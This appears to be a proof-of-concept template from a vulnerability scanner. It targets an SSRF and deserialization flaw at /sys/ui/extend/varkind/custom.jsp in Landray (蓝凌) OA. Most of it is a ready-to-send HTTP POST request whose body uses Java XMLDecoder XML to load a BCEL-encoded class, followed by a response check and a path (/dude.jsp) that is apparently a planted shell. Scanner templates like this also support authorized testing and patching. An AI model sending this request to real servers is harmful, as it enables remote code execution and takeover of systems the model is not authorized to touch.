<DudePoc_Name>蓝凌 OA custom.jsp 存在SSRF漏洞</DudePoc_Name>
<DudePoc_Description>深圳市蓝凌软件股份有限公司 OA系统 /sys/ui/extend/varkind/custom.jsp 存在SSRF漏洞，攻击者可利用此漏洞获取服务器控制权限。</DudePoc_Description>
<DudePoc_SetHeader>
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void+class%3d"com.sun.org.apache.bcel.internal.util.ClassLoader"><void+method%3d"loadClass"><string>$$BCEL$$1234</string><void+method%3d"newInstance"></void></void></void></java>
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?您的请求已提交)(?=.*?icon).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode>/dude.jsp</DudePoc_AttackCode>
